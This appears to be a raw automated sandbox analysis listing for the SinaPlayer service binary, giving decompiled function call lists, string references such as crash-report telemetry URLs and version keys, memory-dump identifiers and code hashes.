                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,SinaPlayer,SinaPlayer), ref: 0037F9D1
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F9DA
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??1FilePath@base@@QAE@XZ.BASE ref: 0037F9E3
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F9F9
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0039849B
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000001C), ref: 003984C5
                                                                                                                                                                                                    • ??0MemoryMappedFile@base@@QAE@XZ.BASE ref: 003984DD
                                                                                                                                                                                                    • ?Initialize@MemoryMappedFile@base@@QAE_NABVFilePath@2@@Z.BASE(?), ref: 003984FC
                                                                                                                                                                                                    • ??1MemoryMappedFile@base@@QAE@XZ.BASE(?,?), ref: 00398531
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398538
                                                                                                                                                                                                    • ?Read@JSONReader@base@@SAPAVValue@2@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@Z.BASE(?), ref: 003985A6
                                                                                                                                                                                                    • ?GetString@DictionaryValue@base@@QBE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV34@@Z.BASE(?,00000000), ref: 0039862B
                                                                                                                                                                                                    • ?GetString@DictionaryValue@base@@QBE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV34@@Z.BASE(?,00000000), ref: 00398664
                                                                                                                                                                                                    • ?SysUTF8ToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 003986DE
                                                                                                                                                                                                    • ?SysUTF8ToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?,00000000), ref: 0039871C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0039873E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398761
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00398794
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003987BB
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$BasicFile@base@@MappedMemoryPiece@String$Append@D@2@@std@@D@2@@std@@@1@@DictionaryPathString@V01@V01@@V12@V34@@Value@base@@W@2@@std@@W@2@@std@@@Wide@base@@$??2@D@2@@std@@@2@@Exists@base@@Get@Initialize@Path@1@@Path@2@@Path@base@@@Read@Reader@base@@Service@@Value@2@
                                                                                                                                                                                                    • String ID: backup_ver$cur_ver
                                                                                                                                                                                                    • API String ID: 4130236664-3805504336
                                                                                                                                                                                                    • Opcode ID: 6da94db429e7fbb078aa22865beeb60445b7e565413966139024ad96b7352f8e
                                                                                                                                                                                                    • Instruction ID: 2345d104de5f46ebb7cc5adc74c016d575f5db9a7e31cac8446b688744cc970e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6da94db429e7fbb078aa22865beeb60445b7e565413966139024ad96b7352f8e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3B148B0D04258DFEF22DFA8C845BDEBBB5BF06304F1440A9D449A7282DB755A88CF52
                                                                                                                                                                                                    Function 6C580C66 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • atol.MSVCR120(.Xl,.Xl,00000010,00000000,6C58028F,00000000), ref: 6C5AD17F
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6C5AD1DF
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6C5AD248
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::$atol
                                                                                                                                                                                                    • String ID: .$.$.Xl$NULL$`non-type-template-parameter$`template-parameter
                                                                                                                                                                                                    • API String ID: 2083219425-3499164713
                                                                                                                                                                                                    • Opcode ID: fe70d55782e9016af4f972b06d184060e495200003c97e87d4ebc17b54e5444f
                                                                                                                                                                                                    • Instruction ID: dba557069d5f99e3409513d3682266d0ca1cb3dfb72465f8a35fcda3cf41818b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe70d55782e9016af4f972b06d184060e495200003c97e87d4ebc17b54e5444f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3710771906258DEEB20EBB5CC94FEDB778AF91308F50045AE405A7A80DF749E8DCB61
                                                                                                                                                                                                    Function 00379B60 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 00379BAE
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00379BD1
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00379C0B
                                                                                                                                                                                                      • Part of subcall function 00379F20: ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,?,?), ref: 00379F5C
                                                                                                                                                                                                      • Part of subcall function 00379F20: ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F7,?), ref: 00379F72
                                                                                                                                                                                                      • Part of subcall function 00379F20: ?CreateFileVersionInfo@FileVersionInfo@@SAPAV1@ABVFilePath@base@@@Z.BASE(?), ref: 00379F87
                                                                                                                                                                                                      • Part of subcall function 00379F20: ?SysWideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,00000000), ref: 00379FB1
                                                                                                                                                                                                      • Part of subcall function 00379F20: ??3@YAXPAX@Z.MSVCR120(?), ref: 00379FCF
                                                                                                                                                                                                      • Part of subcall function 00379F20: ??3@YAXPAX@Z.MSVCR120(?), ref: 00379FF2
                                                                                                                                                                                                      • Part of subcall function 00379F20: ??1FilePath@base@@QAE@XZ.BASE ref: 0037A014
                                                                                                                                                                                                      • Part of subcall function 00379F20: ?Base64Encode@base@@YAXABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(?,?,?), ref: 0037A05A
                                                                                                                                                                                                      • Part of subcall function 00379F20: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A073
                                                                                                                                                                                                    • ?Now@Time@base@@SA?AV12@XZ.BASE(?), ref: 00379C41
                                                                                                                                                                                                    • ?ToDoubleT@Time@base@@QBENXZ.BASE ref: 00379C4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 003762A3
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762BA
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762CB
                                                                                                                                                                                                      • Part of subcall function 00376260: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00376402
                                                                                                                                                                                                      • Part of subcall function 00376260: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 0037640F
                                                                                                                                                                                                      • Part of subcall function 00376260: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 0037641C
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037642C
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376440
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                      • Part of subcall function 00376260: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 00376305
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376327
                                                                                                                                                                                                      • Part of subcall function 00376260: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00376332
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037635C
                                                                                                                                                                                                      • Part of subcall function 00376260: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 0037636D
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376392
                                                                                                                                                                                                      • Part of subcall function 00376260: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 0037639D
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 003763C9
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00379CAD
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB,?,?,?), ref: 0037B165
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000,?,?,?), ref: 0037B189
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(?,?,?), ref: 0037B1C3
                                                                                                                                                                                                      • Part of subcall function 0037B110: GetCurrentThreadId.KERNEL32 ref: 0037B1FE
                                                                                                                                                                                                      • Part of subcall function 0037B110: GetTickCount.KERNEL32 ref: 0037B224
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?), ref: 0037B23D
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,?), ref: 0037B260
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?), ref: 0037B271
                                                                                                                                                                                                      • Part of subcall function 0037B110: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B294
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,?), ref: 00379CDD
                                                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,00000000,00000000,?), ref: 00379CFA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,00000000), ref: 00379D5D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 00379DB2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00379DDE
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00379E41
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 00379E4D
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 00379E56
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • http://log.v.iask.com/n.gif?app=pcClient&type=crash&clientType=0&machineCode=, xrefs: 00379D7E
                                                                                                                                                                                                    • http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=, xrefs: 00379C79
                                                                                                                                                                                                    • &appVersion=, xrefs: 00379C6D, 00379D6C
                                                                                                                                                                                                    • &timestamp=, xrefs: 00379C67, 00379D66
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$V01@$??3@??6?$basic_ostream@File$?sputc@?$basic_streambuf@U?$char_traits@_$D@std@@V?$allocator@V?$basic_string@W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@Osfx@?$basic_ostream@Path@base@@Path@base@@@Time@base@@Version$??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?clear@?$basic_ios@Base64BasicCountCreateCurrentD@2@@std@@D@2@@std@@@D@2@@std@@@1@DoubleEncode@base@@F8@base@@Get@Info@Info@@Now@PathPiece@Service@@StringThreadTickV01@@V12@V?$allocator@_V?$basic_string@_W@2@@3@@W@std@@Wide
                                                                                                                                                                                                    • String ID: &appVersion=$&timestamp=$http://log.v.iask.com/n.gif?app=pcClient&type=crash&clientType=0&machineCode=$http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=
                                                                                                                                                                                                    • API String ID: 1063858033-840303552
                                                                                                                                                                                                    • Opcode ID: 0b97e5ff420e8bc0a9b54916e218d871b6f79a080199771d18cd66e4f63425d1
                                                                                                                                                                                                    • Instruction ID: f22825eb5fcd2d8c12e3cb6cd1a47d9903df942bcc53ba38b29b3961d109a167
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b97e5ff420e8bc0a9b54916e218d871b6f79a080199771d18cd66e4f63425d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 928161B1D00248DBDF22DFA4DD4ABDDBBB8BB14304F148599E40AB7281DB755A48CF61
                                                                                                                                                                                                    Function 00374310 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 107threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00374337
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037435A
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00374394
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003743D1
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 003743F1
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037440E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00374431
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00374442
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 00374452
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120 ref: 0037445D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00374465
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00374486
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$??6?$basic_ostream@?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$?sputc@?$basic_streambuf@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickU?$char_traits@_V01@@V01@_V?$basic_ostream@W@std@@@std@@
                                                                                                                                                                                                    • String ID: )#sinaliveupgrade#[$)- $5$ApnsHTTP.cpp$RequestGet bret =
                                                                                                                                                                                                    • API String ID: 2161555721-3294862416
                                                                                                                                                                                                    • Opcode ID: 2bc0d7097b9a2daab25a7db0c0bf1bc5116333add00cfd370ace5d869b82c9ef
                                                                                                                                                                                                    • Instruction ID: 6204b65cffc69d1dac7a6581b3217a830e05e427234df73c8b9cd9838311a5a9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bc0d7097b9a2daab25a7db0c0bf1bc5116333add00cfd370ace5d869b82c9ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28418276D00208DFCF26EFA4ED4BADDB7B8EB54346F004499E40AAB291DB755A48CF11
                                                                                                                                                                                                    Function 003744EB Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 106threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00374521
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00374544
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037457E
                                                                                                                                                                                                    • ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 003745C0
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003745DD
